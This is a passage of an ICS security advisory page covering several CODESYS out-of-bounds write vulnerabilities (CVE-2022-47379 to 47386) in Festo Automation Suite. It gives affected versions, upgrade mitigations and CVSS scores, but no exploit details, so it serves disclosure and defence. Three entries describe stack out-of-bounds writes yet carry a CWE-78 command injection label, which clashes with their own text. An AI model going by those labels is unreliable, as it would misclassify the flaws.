<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-47379</a></h3>
<div class="csaf-accordion-content">
<p>An authenticated, remote attacker may use a out-of-bounds write vulnerability in multiple CODESYS products in multiple versions to write data into memory which can lead to a denial-of-service condition, memory overwriting, or remote code execution.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-47379">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-47380</a></h3>
<div class="csaf-accordion-content">
<p>An authenticated remote attacker may use a stack basedout-of-bounds write vulnerability in multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-47380">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-47381</a></h3>
<div class="csaf-accordion-content">
<p>An authenticated remote attacker may use a stack based out-of-bounds write vulnerability in multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-47381">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-47383</a></h3>
<div class="csaf-accordion-content">
<p>An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-47383">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-47384</a></h3>
<div class="csaf-accordion-content">
<p>An authenticated remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-47384">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-47385</a></h3>
<div class="csaf-accordion-content">
<p>An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpAppForce Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-47385">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-47386</a></h3>
<div class="csaf-accordion-content">
<p>An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-47386">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-47387</a></h3>
<div class="csaf-accordion-content">
